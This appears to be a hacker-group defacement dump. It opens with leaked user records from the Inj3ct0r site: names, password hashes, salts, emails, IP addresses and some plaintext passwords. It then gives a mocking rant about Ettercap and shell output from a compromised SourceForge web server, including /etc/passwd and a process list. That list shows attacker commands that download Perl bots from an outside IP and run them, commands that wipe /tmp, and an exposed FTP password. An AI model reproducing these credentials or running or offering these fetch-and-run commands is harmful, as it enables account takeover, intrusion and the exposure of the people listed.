                                   __  \\____//                        
                                  /{_\_/   `'\____                     
                                  \___   (o)  (o  }   I AM AN INJ3CT0R 
       _____________________________/          :--' /     CHICK, MOO   
   ,-,'`@@@@@@@@       @@@@@@         \_    `__\                       
  ;:(  @@@@@@@@@        @@@             \___(o'o)                      
  :: )  @@@@          @@@@@@        ,'@@(  `===='                      
  :: : @@@@@:          @@@@         `@@@:                              
  :: \  @@@@@:       @@@@@@@)    (  '@@@'                              
  ;; /\      /`,    @@@@@@@@@\   :@@@@@)                               
  ::/  )    {_----------------:  :~`,~~;                               
 ;;'`; :   )                  :  / `; ;                                
;;;; : :   ;                  :  ;  ; :                                
`'`' / :  :                   :  :  : :                                
    )_ \__;      ";"          :_ ;  \_\       `,','                    
    :__\  \    * `,'*         \  \  :  \   *  8`;'*  *                 
        `^'     \ :/           `^'  `-^-'   \v/ :  \/   BA             



Sid3^effects:661567a4c0a71a50fdcf4b2c550775d4:}uP>ob0J%H?EB_&*9z(q7:v%w)j,yx:[email protected]:122.164.235.10:
L0rd CrusAd3r:2685fd80293b5b6cf1a2d2f488b2db72:{pmYzcy%QfgFy0ftJ?_>"F|L42vtcK:[email protected]:59.92.22.151:
Inj3ct0r:170aebb9d6ba17f411e90b931421f703:.Q:eI}"c";[e`?'o6N/al|}RE;-mNU:[email protected]::
eidelweiss:cd0c84191f189462696ec6de04a5455b:KNU@c;qRh;j$Qc9Vp+r=:$<Pi/rr]T:[email protected]:125.167.199.36:
Sn!pEr.S!Te:c5e3f6e791415b187d3d4e2b3d925f77:H?OV^L*.MS@Q03f9uQ_g]D|@vTE0_v:[email protected]:188.52.23.241:1111117
SONiC:4470e1dc2c49e82f9fca1a3dfc390b1a:4gJ4eT\Rj|L}O/%6(@,&05#:ofzi}#:[email protected]:115.242.246.84:
Napst3r:d73666e5df3d0eb8a714d5a82178e5d7:#}bjIPUanj,[v2yiQVg~oZhv&<g;`k:[email protected]:94.183.216.10:3124741
Th3 RDX:b76091a46d7539eacf00cb149f12f963:0;a?QrF0KSHPX"t_q\?.[N&(@mK|K[:[email protected]:78.107.237.16:
agix:81c472aa99efd24319045f02d5f16be6:e_AcAV4sgTlR6rPEk)-&aexwXLqGpo:[email protected]:82.228.79.212:laconte
gunslinger_:1b804cc6bf8cbd19c7276d694cf538a6:N_}fYU<sB676{aGTg([1*`p<$yztnG:[email protected]:182.0.91.89:
indoushka:3d277315b290351a56ec18e4aee1a988:VZIKmamSDtKwy&KnJU)uT`viut}c,$:[email protected]:41.107.107.238:123456789
SeeMe:f3dfe545ae017c7fcb8c7df9884255f1:s~.$o798QL'>}mFtE1ZHRD(LW/Uvhj:[email protected]:41.252.59.225:
KnocKout:64f26f1e22bba61290603bc8f514a56d:`gXoY<&>G~m02Z)EMJK{*oRa\>8aAr:[email protected]:88.242.249.163:
anT!-Tr0J4n:b6f1b2d02236cb9bc983482c5789999c:`dFJd>n&KjhTtynf#L05jSQ%h'=jsl:[email protected]:41.191.28.15:

,_._._._._._._._|____________________________________________________ 
|_|_|_|_|_|_|_|_|___________________________________________________/ 
   ~ ettercap ~ !                                                     
                                                                      
You would think that the authors of Ettercap, one of the most  popular
whitehat  pentesting  tools,  would  know  the  basics  of   security.
Apparently they don't, or they just  don't  give  a  shit  about  what
happens to their users.                                               
                                                                      
So, why is their website so  insecure?  Ettercap's  message  board  is
hosted at Sourceforge, so they share a server with thousands of  other
customers. Every single customer  is  able  to  execute  commands  and
access the other project directories. Pretty stupid, eh? You only need
to find one hole in one hosted site and you can access ALL the project
databases. Of course  that  isn't  ALoR's  fault,  it's  Sourceforge's
fault. Regardless, people who care about security and  data  integrity
wouldn't use such a shitty provider,  would  they?  To  be  fair,  the
Ettercap project is dead. Most of the admins have been inactive for  a
few years now, but that  is  no  excuse  for  such  a  security  mess.
Especially since the server was compromised some five years ago.      
                                                                      
Just look at the process list, horrible.  Even  the  worst  perl  bots
(scax) get access. If such a poorly written  bot  can  own  this  box,
everyone can.                                                         
                                                                      
Some  good  advice  to  all  other  people/projects  who   are   using
Sourceforge: Move. There are  enough  good  alternatives.  Yes,  I  am
talking to you Vim, get the fuck out of there.  And  to  all  Ettercap
users: arp  poisoning  is  *not*  hacking.  If  you  want  to  achieve
something real, learn the fundamentals and not how to use a GUI. Don't
sniff the passwords of your friends  and  call  yourself  a  pentester
(looking at you firesheep).                                           
                                                                      
	  _   _                                                       
	 | | | |                                                      
      ___| |_| |_ ___ _ __ ___ _ __  __    _ __                       
     / _ \ __| __/ _ \ '__/ __| '__|/  \  | '_ \                      
    |  __/ |_| ||  __/ | | (__| |  / /\ \ | |_) |                     
     \___|\__|\__\___|_|  \___|_| /_/  \_\| .__/                      
					  | |                         
					  |_|                         
		    Baa.                                              
	     I flood SID's                                            
	       I'm a Hacker!!              Baa.                       
 Baa.           Baa.              I sit at starbucks                  
I sniff packets         |               I'm a Hacker!!                
I'm a Hacker!!         |                   Baa.                       
Baa..                |                   /                            
 \         __  _    |                  /           YOUR ALL FUCKING   
  \    .-.'  `; `-._  __  _         __  _               SHEEP.        
   \  (_,         .-:'  `; `-._.-.:'  `; `-._                         
    ,'o"(  "HACKE(_,          (_,            )                        
   (__,-'      ,'o"(  "HACKE,'o"(  "HACKER"   )>   STOP BEING SHEEP!  
      (       (__,-'       (__,-'             )                       
       `-'._.--._(             (             )     FUCKING INNOVATE!  
	  |||  |||`-'._.--._.-' `-'._.--._.-'                         
		     |||  |||      |||  |||                           

$ uname -a
Linux sfp-web-9.v30.ch3.sourceforge.com 2.6.18-194.11.4.el5 #1 SMP Tue Sep 21 05:04:09 EDT 2010 x86_64 x86_64 x86_64 GNU/Linux

$ id
uid=48(apache) gid=48(apache) groups=48(apache),302(amqp)

$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
news:x:9:13:news:/etc/news:
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
nscd:x:28:28:NSCD Daemon:/:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
exim:x:93:93::/var/spool/exim:/sbin/nologin
rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
nfsnobody:x:4294967294:4294967294:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
pcap:x:77:77::/var/arpwatch:/sbin/nologin
avahi:x:70:70:Avahi daemon:/:/sbin/nologin
ntp:x:38:38::/etc/ntp:/sbin/nologin
rpm:x:37:37::/var/lib/rpm:/sbin/nologin
haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
xfs:x:43:43:X Font Server:/etc/X11/fs:/sbin/nologin
named:x:25:25:Named:/var/named:/sbin/nologin
sashroot:x:0:500:sashroot:/sashroot:/bin/bash
osiris:x:300:300:Osiris Daemon:/var/lib/osiris:/sbin/nologin
puppet:x:301:301:Puppet:/var/lib/puppet:/sbin/nologin
apache:x:48:48:Apache:/var/www:/sbin/nologin
vhost:*:310:310:Vhost User:/home/vhost:/bin/bash
rtstats:*:442:442:RTstats user:/var/local/stats:/bin/bash
nginx:x:443:443:Nginx user:/var/lib/nginx:/bin/false
nrpe:x:444:446:NRPE user for the NRPE service:/:/sbin/nologin
dummy:*:103:103:projectweb dummy user:/home/dummy:/bin/false
www:*:448:448:WWW User:/var/www:/bin/bash
sfeng:*:333:333:SF Engineer:/home/sfeng:/bin/rbash
sfeng2:*:332:332:SF Engineer 2:/home/sfeng2:/bin/bash
avahi-autoipd:x:449:449:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin
oprofile:x:16:16:Special user account to be used by OProfile:/home/oprofile:/sbin/nologin
munin:x:450:450:Munin user:/var/lib/munin:/sbin/nologin
rrdcached:x:451:451:rrdcached:/var/rrdtool/rrdcached:/sbin/nologin

$ ps auxwww
USER       PID %CPU %MEM    VSZ   RSS TTY      STAT START   TIME COMMAND
root         1  0.0  0.0  10352    80 ?        Ss   Sep28   0:46 init [3]
root         2  0.0  0.0      0     0 ?        S<   Sep28   1:58 [migration/0]
root         3  0.0  0.0      0     0 ?        SN   Sep28   0:01 [ksoftirqd/0]
root         4  0.0  0.0      0     0 ?        S<   Sep28   0:00 [watchdog/0]
root         5  0.0  0.0      0     0 ?        S<   Sep28   0:03 [migration/1]
root         6  0.0  0.0      0     0 ?        SN   Sep28   0:48 [ksoftirqd/1]
root         7  0.0  0.0      0     0 ?        S<   Sep28   0:00 [watchdog/1]
root         8  0.0  0.0      0     0 ?        S<   Sep28   0:03 [migration/2]
root         9  0.0  0.0      0     0 ?        SN   Sep28   0:09 [ksoftirqd/2]
root        10  0.0  0.0      0     0 ?        S<   Sep28   0:00 [watchdog/2]
root        11  0.0  0.0      0     0 ?        S<   Sep28   0:03 [migration/3]
root        12  0.0  0.0      0     0 ?        SN   Sep28   1:42 [ksoftirqd/3]
root        13  0.0  0.0      0     0 ?        S<   Sep28   0:00 [watchdog/3]
root        14  0.0  0.0      0     0 ?        S<   Sep28   0:14 [migration/4]
root        15  0.0  0.0      0     0 ?        SN   Sep28   0:02 [ksoftirqd/4]
root        16  0.0  0.0      0     0 ?        S<   Sep28   0:00 [watchdog/4]
root        17  0.0  0.0      0     0 ?        S<   Sep28   0:20 [migration/5]
root        18  0.0  0.0      0     0 ?        SN   Sep28   0:04 [ksoftirqd/5]
root        19  0.0  0.0      0     0 ?        S<   Sep28   0:00 [watchdog/5]
root        20  0.0  0.0      0     0 ?        S<   Sep28   0:09 [migration/6]
root        21  0.0  0.0      0     0 ?        SN   Sep28   0:03 [ksoftirqd/6]
root        22  0.0  0.0      0     0 ?        S<   Sep28   0:00 [watchdog/6]
root        23  0.0  0.0      0     0 ?        S<   Sep28   0:08 [migration/7]
root        24  0.0  0.0      0     0 ?        SN   Sep28   0:03 [ksoftirqd/7]
root        25  0.0  0.0      0     0 ?        S<   Sep28   0:00 [watchdog/7]
root        26  0.0  0.0      0     0 ?        S<   Sep28   0:00 [events/0]
root        27  0.0  0.0      0     0 ?        S<   Sep28   0:00 [events/1]
root        28  0.0  0.0      0     0 ?        S<   Sep28   0:00 [events/2]
root        29  0.0  0.0      0     0 ?        S<   Sep28   0:00 [events/3]
root        30  0.0  0.0      0     0 ?        S<   Sep28   0:00 [events/4]
root        31  0.0  0.0      0     0 ?        S<   Sep28   0:00 [events/5]
root        32  0.0  0.0      0     0 ?        S<   Sep28   0:00 [events/6]
root        33  0.0  0.0      0     0 ?        S<   Sep28   0:00 [events/7]
root        34  0.0  0.0      0     0 ?        S<   Sep28   0:00 [khelper]
root       105  0.0  0.0      0     0 ?        S<   Sep28   0:00 [kthread]
root       116  0.0  0.0      0     0 ?        S<   Sep28   0:00 [kblockd/0]
root       117  0.0  0.0      0     0 ?        S<   Sep28   0:01 [kblockd/1]
root       118  0.0  0.0      0     0 ?        S<   Sep28   0:00 [kblockd/2]
root       119  0.0  0.0      0     0 ?        S<   Sep28   0:01 [kblockd/3]
root       120  0.0  0.0      0     0 ?        S<   Sep28   0:00 [kblockd/4]
root       121  0.0  0.0      0     0 ?        S<   Sep28   0:00 [kblockd/5]
root       122  0.0  0.0      0     0 ?        S<   Sep28   0:00 [kblockd/6]
root       123  0.0  0.0      0     0 ?        S<   Sep28   0:01 [kblockd/7]
root       124  0.0  0.0      0     0 ?        S<   Sep28   0:00 [kacpid]
root       237  0.0  0.0      0     0 ?        S<   Sep28   0:00 [cqueue/0]
root       238  0.0  0.0      0     0 ?        S<   Sep28   0:00 [cqueue/1]
root       239  0.0  0.0      0     0 ?        S<   Sep28   0:00 [cqueue/2]
root       240  0.0  0.0      0     0 ?        S<   Sep28   0:00 [cqueue/3]
root       241  0.0  0.0      0     0 ?        S<   Sep28   0:00 [cqueue/4]
root       242  0.0  0.0      0     0 ?        S<   Sep28   0:00 [cqueue/5]
root       243  0.0  0.0      0     0 ?        S<   Sep28   0:00 [cqueue/6]
root       244  0.0  0.0      0     0 ?        S<   Sep28   0:00 [cqueue/7]
root       247  0.0  0.0      0     0 ?        S<   Sep28   0:00 [khubd]
root       249  0.0  0.0      0     0 ?        S<   Sep28   0:00 [kseriod]
root       364  0.0  0.0      0     0 ?        S    Sep28   0:00 [khungtaskd]
root       367  0.0  0.0      0     0 ?        S<   Sep28  29:37 [kswapd0]
root       368  0.0  0.0      0     0 ?        S<   Sep28   0:00 [aio/0]
root       369  0.0  0.0      0     0 ?        S<   Sep28   0:00 [aio/1]
root       370  0.0  0.0      0     0 ?        S<   Sep28   0:00 [aio/2]
root       371  0.0  0.0      0     0 ?        S<   Sep28   0:00 [aio/3]
root       372  0.0  0.0      0     0 ?        S<   Sep28   0:00 [aio/4]
root       373  0.0  0.0      0     0 ?        S<   Sep28   0:00 [aio/5]
root       374  0.0  0.0      0     0 ?        S<   Sep28   0:00 [aio/6]
root       375  0.0  0.0      0     0 ?        S<   Sep28   0:00 [aio/7]
root       539  0.0  0.0      0     0 ?        S<   Sep28   0:00 [kpsmoused]
root       618  0.0  0.0      0     0 ?        S<   Sep28   0:00 [scsi_eh_0]
root       637  0.0  0.0      0     0 ?        S<   Sep28   0:00 [ata/0]
root       638  0.0  0.0      0     0 ?        S<   Sep28   0:00 [ata/1]
root       639  0.0  0.0      0     0 ?        S<   Sep28   0:00 [ata/2]
root       640  0.0  0.0      0     0 ?        S<   Sep28   0:00 [ata/3]
root       641  0.0  0.0      0     0 ?        S<   Sep28   0:00 [ata/4]
root       642  0.0  0.0      0     0 ?        S<   Sep28   0:00 [ata/5]
root       643  0.0  0.0      0     0 ?        S<   Sep28   0:00 [ata/6]
root       644  0.0  0.0      0     0 ?        S<   Sep28   0:00 [ata/7]
root       645  0.0  0.0      0     0 ?        S<   Sep28   0:00 [ata_aux]
root       664  0.0  0.0      0     0 ?        S<   Sep28   0:00 [scsi_eh_1]
root       665  0.0  0.0      0     0 ?        S<   Sep28   5:14 [usb-storage]
root       667  0.0  0.0      0     0 ?        S<   Sep28   0:00 [scsi_eh_2]
root       668  0.0  0.0      0     0 ?        S<   Sep28   1:45 [usb-storage]
root       679  0.0  0.0      0     0 ?        S<   Sep28   0:00 [kstriped]
root       716  0.0  0.0      0     0 ?        S<   Sep28   0:00 [ksnapd]
root       755  0.0  0.0      0     0 ?        S<   Sep28  30:00 [kjournald]
root       780  0.0  0.0      0     0 ?        S<   Sep28   0:02 [kauditd]
root       813  0.0  0.0  12764   168 ?        S<s  Sep28   0:00 /sbin/udevd -d
root      1571  0.0  0.0      0     0 ?        S<   Sep28   0:00 [kedac]
root      2416  0.0  0.0      0     0 ?        S<   Sep28   0:00 [kmpathd/0]
root      2417  0.0  0.0      0     0 ?        S<   Sep28   0:00 [kmpathd/1]
root      2418  0.0  0.0      0     0 ?        S<   Sep28   0:00 [kmpathd/2]
root      2419  0.0  0.0      0     0 ?        S<   Sep28   0:00 [kmpathd/3]
root      2420  0.0  0.0      0     0 ?        S<   Sep28   0:00 [kmpathd/4]
root      2421  0.0  0.0      0     0 ?        S<   Sep28   0:00 [kmpathd/5]
root      2422  0.0  0.0      0     0 ?        S<   Sep28   0:00 [kmpathd/6]
root      2423  0.0  0.0      0     0 ?        S<   Sep28   0:00 [kmpathd/7]
root      2424  0.0  0.0      0     0 ?        S<   Sep28   0:00 [kmpath_handlerd]
root      2448  0.0  0.0      0     0 ?        S<   Sep28   0:00 [kjournald]
root      2931  0.0  0.0      0     0 ?        S<   Sep28   0:00 [bond0]
root      3221  0.0  0.0  92864   476 ?        S<sl Sep28   2:13 auditd
root      3223  0.0  0.0  81804   292 ?        S<sl Sep28   2:33 /sbin/audispd
root      3253  0.0  0.0   5912   308 ?        Ss   Sep28   1:09 syslogd -m 0
root      3256  0.0  0.0   3808   196 ?        Ss   Sep28   0:15 klogd -x
root      3270  0.0  0.0  10764   280 ?        Ss   Sep28   1:06 irqbalance
named     3307  0.0  0.0 291644  3428 ?        Ssl  Sep28  79:54 /usr/sbin/named -u named
rpc       3341  0.0  0.0   8056    32 ?        Ss   Sep28   0:00 portmap
root      3378  0.0  0.0      0     0 ?        S<   Sep28  44:14 [rpciod/0]
root      3379  0.0  0.0      0     0 ?        S<   Sep28   0:19 [rpciod/1]
root      3380  0.0  0.0      0     0 ?        S<   Sep28   0:16 [rpciod/2]
root      3381  0.0  0.0      0     0 ?        S<   Sep28   0:19 [rpciod/3]
root      3382  0.0  0.0      0     0 ?        S<   Sep28   1:01 [rpciod/4]
root      3383  0.0  0.0      0     0 ?        S<   Sep28   0:17 [rpciod/5]
root      3384  0.0  0.0      0     0 ?        S<   Sep28   0:16 [rpciod/6]
root      3385  0.0  0.0      0     0 ?        S<   Sep28   0:18 [rpciod/7]
rpcuser   3398  0.0  0.0  10164   212 ?        Ss   Sep28   0:00 rpc.statd
root      3421  0.0  0.0  55448     4 ?        Ss   Sep28   0:00 rpc.idmapd
dbus      3444  0.0  0.0  21260     4 ?        Ss   Sep28   0:00 dbus-daemon --system
root      3498  0.0  0.0      0     0 ?        S<   Sep28   9:35 [nfsiod]
root      3499  0.0  0.0      0     0 ?        S    Sep28   0:00 [lockd]
root      3568  0.0  0.0   3804     4 ?        Ss   Sep28   0:00 /usr/sbin/acpid
nscd      3589  0.0  0.0 252376   828 ?        Ssl  Sep28  24:19 /usr/sbin/nscd
root      3630  0.0  0.0  67656   332 ?        Ss   Sep28   0:48 /usr/sbin/sshd
root      3647  0.0  0.0  22072   412 ?        Ss   Sep28   1:15 xinetd -stayalive -pidfile /var/run/xinetd.pid
ntp       3667  0.0  0.0  23820  5452 ?        SLs  Sep28   0:31 ntpd -u ntp:ntp -p /var/run/ntpd.pid
exim      3686  0.0  0.0  80572   580 ?        Ss   Sep28   0:35 /usr/sbin/exim -bd -q1h
root      3824  0.0  0.0  72920   488 ?        Ss   Sep28   0:36 crond
root      3839  0.0  0.0  95052  3052 ?        Ss   Sep28   0:36 /usr/sbin/munin-node
root      4211  0.0  0.0  69544     4 ?        Ssl  Oct13   0:00 sfcbd -d
root      4213  0.0  0.0  59300     4 ?        S    Oct13   0:00 sfcbd -d
root      4214  0.0  0.0  71740     4 ?        S    Oct13   0:00 sfcbd -d
root      4274  0.0  0.0 159036  3408 ?        Sl   Oct13   5:06 /usr/sbin/snmpd -LSnd -Lf /dev/null -p /var/run/snmpd.pid -a -c /etc/snmp/snmpd.sfinc-utils.conf
root      4303  0.0  0.0  61380     4 ?        S    Oct13   0:00 sfcbd -d
root      4417  0.0  0.0      0     0 ?        S    Nov24   0:12 [pdflush]
root      4565  0.0  0.0 279692  2792 ?        Ssl  Oct13   8:44 /opt/dell/srvadmin/sbin/dsm_sa_datamgrd
root      4568  0.0  0.0  61360     4 ?        S    Oct13   0:00 sfcbd -d
root      4571  0.0  0.0  73688     4 ?        S    Oct13   0:00 sfcbd -d
root      4864  0.0  0.0 174704   528 ?        Ssl  Oct13   0:36 /opt/dell/srvadmin/sbin/dsm_sa_eventmgrd
root      4925  0.0  0.0 254748  2084 ?        Ssl  Oct13  15:43 /opt/dell/srvadmin/sbin/dsm_sa_snmpd
avahi     5106  0.0  0.0  21612   532 ?        Ss   Sep28   0:00 avahi-daemon: running [sfp-web-9.local]
avahi     5107  0.0  0.0  21480   200 ?        Ss   Sep28   0:00 avahi-daemon: chroot helper
68        5156  0.0  0.0  29540  1216 ?        Ss   Sep28   0:52 hald
root      5157  0.0  0.0  21700   448 ?        S    Sep28   0:00 hald-runner
68        5188  0.0  0.0  10656   484 ?        S    Sep28   0:00 hald-addon-acpi: listening on acpid socket /var/run/acpid.socket
68        5200  0.0  0.0  10660   480 ?        S    Sep28   0:00 hald-addon-keyboard: listening on /dev/input/event0
root      5208  0.0  0.0  10232   432 ?        S    Sep28   4:39 hald-addon-storage: polling /dev/scd0
root      5213  0.0  0.0  10232   432 ?        S    Sep28   1:13 hald-addon-storage: polling /dev/hda
root      5215  0.0  0.0  10232   440 ?        S    Sep28   1:07 hald-addon-storage: polling /dev/sdb
root      5245  0.0  0.0  35904   240 ?        S    Sep28   0:00 /usr/sbin/osirisd -r /var/lib/osiris
osiris    5246  0.0  0.0  36116   748 ?        S    Sep28   0:00 /usr/sbin/osirisd -r /var/lib/osiris
root      5249  0.0  0.0   3796   436 tty1     Ss+  Sep28   0:00 /sbin/mingetty tty1
root      5250  0.0  0.0   3796   436 tty2     Ss+  Sep28   0:00 /sbin/mingetty tty2
root      5251  0.0  0.0   3796   436 tty3     Ss+  Sep28   0:00 /sbin/mingetty tty3
root      5252  0.0  0.0   3796   436 tty4     Ss+  Sep28   0:00 /sbin/mingetty tty4
root      5254  0.0  0.0   3796   436 tty5     Ss+  Sep28   0:00 /sbin/mingetty tty5
root      5256  0.0  0.0   3796   436 tty6     Ss+  Sep28   0:00 /sbin/mingetty tty6
apache    5767  0.0  0.0   8704   828 ?        S    Nov18   0:00 sh -c cd /tmp;rm -rf *;lftpget http://95.178.16.118/scax.txt;perl scax.txt;cd /tmp; rm -rf *
apache    5769  0.0  0.0  58608  1508 ?        S    Nov18   0:00 lftp -c set cmd:at-exit;set xfer:max-redirections 16;  get1  "http://95.178.16.118/scax.txt";
apache    8772  0.0  0.4 395468 38516 ?        S    Nov23   0:02 /usr/sbin/httpd
apache    9928  0.0  0.4 393956 39732 ?        S    Nov24   0:05 /usr/sbin/httpd
root     10444  0.0  0.0 316928  6416 ?        Ss   Nov16   0:27 /usr/sbin/httpd
root     10445  0.0  0.0   3852   504 ?        S    Nov16   1:57 /usr/sbin/cronolog --symlink=/var/local/log/error_log /var/local/log/%Y/%m/%d/error.log
root     10447  0.0  0.0   3848   440 ?        S    Nov16   1:23 /usr/sbin/cronolog --symlink=/var/local/log/vhost_log /var/local/log/%Y/%m/%d/vhost_log
root     10448  0.0  0.0   3848   460 ?        S    Nov16   5:50 /usr/sbin/cronolog --symlink=/var/local/log/access_log /var/local/log/%Y/%m/%d/access_log
root     10449  0.0  0.0   3856   440 ?        S    Nov16   0:03 /usr/sbin/cronolog --symlink=/var/local/log/developerweb_log /var/local/log/%Y/%m/%d/developerweb_log
root     10450  0.0  0.2 125312 18580 ?        Sl   Nov16  10:28 /usr/bin/perl -w /var/local/mastertree/host/sfp-web/scripts/vhost_rewriter
apache   10865  0.0  0.3 390016 25028 ?        S    Nov24   0:01 /usr/sbin/httpd
apache   11814  0.0  0.0   8704  1016 ?        S    Nov24   0:00 sh -c cd /tmp;rm -rf *;lftpget http://95.178.16.118/scax.txt;perl scax.txt;cd /tmp; rm -rf *
apache   11816  0.0  0.0  58608  2620 ?        S    Nov24   0:00 lftp -c set cmd:at-exit;set xfer:max-redirections 16;  get1  "http://95.178.16.118/scax.txt";
apache   12188  0.0  0.0   8704   980 ?        S    Nov24   0:00 sh -c cd /tmp;lftpget http://95.178.16.118/b;chmod  x b;perl b;cd /tmp;rm -rf *;
apache   12189  0.0  0.0  58616  2624 ?        S    Nov24   0:00 lftp -c set cmd:at-exit;set xfer:max-redirections 16;  get1  "http://95.178.16.118/b";
root     12523  0.0  0.0  56648   392 ?        Ss   Nov04   0:00 nginx: master process /usr/sbin/nginx -c /etc/nginx/nginx.conf
nginx    12524  0.2  0.0  57388  1500 ?        S    Nov04  68:37 nginx: worker process                   
nginx    12525  0.1  0.0  57764  1840 ?        S    Nov04  59:01 nginx: worker process                   
nginx    12526  0.2  0.0  57456  1520 ?        S    Nov04  64:31 nginx: worker process                   
nginx    12527  0.2  0.0  58160  2404 ?        S    Nov04  63:14 nginx: worker process                   
nginx    12528  0.1  0.0  57788  1780 ?        S    Nov04  47:43 nginx: worker process                   
nginx    12529  0.1  0.0  57720  1792 ?        S    Nov04  48:26 nginx: worker process                   
nginx    12530  0.2  0.0  57584  1620 ?        S    Nov04  61:50 nginx: worker process                   
nginx    12531  0.2  0.0  57856  1884 ?        S    Nov04  64:09 nginx: worker process                   
apache   13296  0.7  0.5 411004 46200 ?        S    12:18   0:04 /usr/sbin/httpd
apache   13709  0.0  0.5 403000 42372 ?        S    Nov24   0:06 /usr/sbin/httpd
rtstats  15645  1.6  0.1 179260 10884 ?        S    Nov16 221:11 /usr/bin/python /var/local/stats/rtstats/datasources/prweb.py --daemonize --tail --pidfile /var/run/rtstats/prweb.pid --infolog /var/log/rtstats/datasource-prweb.log --configfile /var/local/config/rtstats/datasources/prweb.cfg --configfile /var/local/stats/rtstats.cfg
apache   16268  0.0  0.0  60804  1508 ?        S    Nov19   0:00 lftp -u GFS,87dbcvwx15s4f56ds54f perfo-lehavre.no-ip.org -p 146 -e lcd "/home/groups/f/fl/florianrobinet/htdocs/GFS/Archives"; mirror -s -R --Remove-source-files; exit
apache   17814  0.0  0.0   8704  1040 ?        S    Nov24   0:00 sh -c cd /tmp;rm -rf *;lftpget http://95.178.16.118/scax.txt;perl scax.txt;cd /tmp; rm -rf *
apache   17818  0.0  0.0  58608  2620 ?        S    Nov24   0:00 lftp -c set cmd:at-exit;set xfer:max-redirections 16;  get1  "http://95.178.16.118/scax.txt";
apache   18478  0.0  0.3 391904 28156 ?        S    03:26   0:13 /usr/sbin/httpd
apache   18960  2.8  0.5 398652 45604 ?        S    12:25   0:05 /usr/sbin/httpd
apache   19043  2.5  0.4 398116 33464 ?        S    12:25   0:05 /usr/sbin/httpd
apache   19055  4.9  0.5 405644 41216 ?        S    12:25   0:09 /usr/sbin/httpd
apache   19056  2.9  0.4 402072 37836 ?        S    12:25   0:05 /usr/sbin/httpd
apache   19077  2.5  0.4 399132 35544 ?        S    12:25   0:04 /usr/sbin/httpd
apache   19093  3.0  0.4 397244 34216 ?        S    12:25   0:05 /usr/sbin/httpd
apache   19094  3.1  0.5 398832 43744 ?        S    12:25   0:05 /usr/sbin/httpd
apache   19741  0.0  0.0   8704  1028 ?        S    03:29   0:00 sh -c cd /tmp;rm -rf *;lftpget http://95.178.16.118/scax.txt;perl scax.txt;cd /tmp; rm -rf *
apache   19745  0.0  0.0  58608  2616 ?        S    03:29   0:00 lftp -c set cmd:at-exit;set xfer:max-redirections 16;  get1  "http://95.178.16.118/scax.txt";
apache   19789  2.0  0.4 394212 36988 ?        S    12:27   0:02 /usr/sbin/httpd
apache   19903  2.4  0.4 396360 37188 ?        S    12:27   0:02 /usr/sbin/httpd
apache   19945  2.7  0.3 395120 30760 ?        S    12:27   0:02 /usr/sbin/httpd
apache   20138  3.1  0.3 395072 30492 ?        S    12:27   0:02 /usr/sbin/httpd
apache   20203  2.0  0.4 394404 35928 ?        S    12:27   0:01 /usr/sbin/httpd
apache   20274  3.0  0.3 397052 30000 ?        S    12:27   0:02 /usr/sbin/httpd
apache   20434  0.0  0.3 401880 29916 ?        S    Nov24   0:28 /usr/sbin/httpd
apache   20439  2.5  0.3 393252 30576 ?        S    12:28   0:01 /usr/sbin/httpd
apache   22124  0.0  0.4 401232 34788 ?        S    Nov24   0:05 /usr/sbin/httpd
apache   23720  0.0  0.0   8704  1008 ?        S    Nov24   0:00 sh -c cd /tmp;rm -rf *;lftpget http://95.178.16.118/scax.txt;perl scax.txt;cd /tmp; rm -rf *
apache   23722  0.0  0.0  58608  2620 ?        S    Nov24   0:00 lftp -c set cmd:at-exit;set xfer:max-redirections 16;  get1  "http://95.178.16.118/scax.txt";
apache   24614  0.0  0.0   8704  1020 ?        S    Nov24   0:00 sh -c cd /tmp;rm -rf *;lftpget http://95.178.16.118/scax.txt;perl scax.txt;cd /tmp; rm -rf *
apache   24616  0.0  0.0  58608  2624 ?        S    Nov24   0:00 lftp -c set cmd:at-exit;set xfer:max-redirections 16;  get1  "http://95.178.16.118/scax.txt";
apache   24714  0.0  0.1 377988 12680 ?        S    Nov24   0:00 /usr/sbin/httpd
apache   24719  0.0  0.0   8704   980 ?        S    Nov24   0:00 sh -c cd /tmp;lftpget http://95.178.16.118/b;chmod  x b;perl b;cd /tmp;rm -rf *;
apache   24720  0.0  0.0  58616  2624 ?        S    Nov24   0:00 lftp -c set cmd:at-exit;set xfer:max-redirections 16;  get1  "http://95.178.16.118/b";
apache   25971  0.0  0.0   8704   828 ?        S    Nov21   0:00 sh -c cd /tmp;rm -rf *;lftpget http://95.178.16.118/scax.txt;perl scax.txt;cd /tmp; rm -rf *
apache   25974  0.0  0.0  58608  1512 ?        S    Nov21   0:00 lftp -c set cmd:at-exit;set xfer:max-redirections 16;  get1  "http://95.178.16.118/scax.txt";
root     27631  0.0  0.0      0     0 ?        S    Nov23   0:00 [pdflush]
apache   31023  0.0  0.1 399148  8908 ?        S    Nov23   0:04 /usr/sbin/httpd
apache   31873  0.0  0.3 388288 25512 ?        S    01:48   0:01 /usr/sbin/httpd
apache   32062  0.0  0.0   8704  1064 ?        S    01:48   0:00 sh -c cd /tmp;rm -rf *;lftpget http://95.178.16.118/scax.txt;perl scax.txt;cd /tmp; rm -rf *
apache   32067  0.0  0.0  58608  2620 ?        S    01:48   0:00 lftp -c set cmd:at-exit;set xfer:max-redirections 16;  get1  "http://95.178.16.118/scax.txt";
